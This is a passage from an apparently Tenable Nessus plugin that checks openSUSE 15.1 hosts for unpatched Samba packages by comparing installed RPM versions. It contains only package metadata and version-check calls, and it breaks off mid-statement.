script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-pidl-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( 